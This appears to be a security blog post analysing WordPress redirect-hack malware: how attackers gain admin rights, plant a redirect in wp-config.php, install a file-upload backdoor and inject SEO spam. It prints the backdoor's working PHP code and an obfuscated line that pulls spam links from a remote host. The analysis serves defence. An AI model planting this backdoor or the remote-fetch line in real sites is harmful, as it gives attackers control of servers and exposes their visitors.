Skip to content

Analysis of WordPress malware redirect hack techniques

What is the code of the redirect hack (a user who visits the site has been directed to another malicious site without permission), which has been damaged especially by many sites recently, I would like to explain how it works.


First: Hackers taking over the administrative rights of WordPress

Hackers first take over WordPress administrator in the following manner:

● Repeatedly enforce login and take over administrator privileges (automated by software)
● Take over administrative privileges using vulnerabilities in plugins, themes, and WordPress itself
● Take administrator privileges by using deficiencies in the settings of wp-config.php (for example, the authentication unique key is not set)

Since WordPress has a file change function from the management screen, you can use this function to embed malicious code on your site.

Tampering that redirects users to a different site when they visit any page

In order to redirect users who have accessed various pages such as via search engines, hackers have provided code for redirecting to files that must be read by WordPress.
To redirect all users who have accessed various pages, the code for redirecting is added in the file that is always read by WordPress.

The image above shows the actual tamper code embedded in wp-config.php.

You can see that some file is read from another place and executed by the @include command. In many cases, the malware code is obfuscated.

Set up a file on the site that can upload any file to your server

The redirect hacks that are popular these days always include a file with the following code in the server. It is disguised as a plug-in, or it is placed in the wp-content folder in a file called wpcsesapps.php.

if (isset($_POST['upload'])){
	if ($_POST['upload']=='1'){
		$uploadfile = $_POST['path'].$_FILES['uploadfile']['name'];
		if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
			{echo 'ok';}
		else {echo $_FILES['uploadfile']['error'];}
		}
	if ($_POST['upload']=='2'){
		$fp=fopen($_POST['path'],'a');  
		fwrite($fp, "\r\n");
		fwrite($fp, $_POST['uploadfile']);
		fclose($fp);
		echo 'ok';
		}
	}
else {header('Location: ../../');}

This code is a very dangerous code that allows any file to be uploaded to the server from the outside. It is called a backdoor and is the starting point for site alteration by hackers.

Code that redirects to the wrong site for all links on the page of the site

In addition, there was a case of tampering that redirected the user to another site at the moment of clicking a link on any page of the site by embedding invalid Javascript code in the theme footer.php file.


This code loads a fake link that causes the user to jump to another site for every link in the site. In addition, it is a very clever code that does not activate this function for a certain period of time for users who have already been redirected using COOKIE so that it is only activated once every few hours.

SEO Hack

SEO hacks use a mechanism by which search engines bring search results to the top of a site’s by the amount of linked. It is to embed secretly in the site so as not to get involved.
For the output of this link, hackers embed the following tampering on the sited.

@file_get_contents(str_rot13("uggc://scrq8.bet/xxxxxxx"));

This code gets a link list for performing SEO hacks from servers owned by hackers in real time and prints out on your webpages, and it is possible to set URLs of sites that hackers want to display on search engines at any time they like.

How to detect redirect hack malware?

Click here for a plugin that can detect redirect hack malware.
WordPress Doctor Malware Scan & Security Plug-in